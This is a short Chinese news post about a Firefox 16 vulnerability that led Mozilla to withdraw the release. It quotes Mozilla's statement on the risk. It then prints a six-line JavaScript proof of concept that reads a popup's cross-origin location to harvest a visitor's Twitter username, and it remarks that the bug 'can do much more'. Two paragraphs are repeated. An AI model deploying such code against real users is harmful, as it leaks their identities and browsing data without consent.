火狐浏览器前几天发布了最新的Firefox 16正式版,但是在刚发布一天,就爆出了重大安全漏洞,接着Mozilla在官方首页上移除了Firefox 16的下载链接,转而继续提供Firefox 15.0.1版本。
Mozilla这样解释:“该漏洞可能允许恶意网站获取用户的访问记录,窃取URL或URL参数,不过目前还没有迹象表明这个漏洞已经被人利用。”
这个代码演示了使用Firefox 16的漏洞收集Twitter用户的用户名。当然,还可以干很多事!!!
Mozilla这样解释:“该漏洞可能允许恶意网站获取用户的访问记录,窃取URL或URL参数,不过目前还没有迹象表明这个漏洞已经被人利用。”
下面是利用该漏洞获取用户信息的攻击代码,很简单,只需6行:
- function poc(){
- var win = window.open('https://twitter.com/lists/', 'newWin', 'width=200, height=200');
- setTimeout(function(){
- alert('Hello '+/^https:\/\/twitter.com\/([^/]+)/.exec(win.location)[1])
- }, 5000);
- }
这个代码演示了使用Firefox 16的漏洞收集Twitter用户的用户名。当然,还可以干很多事!!!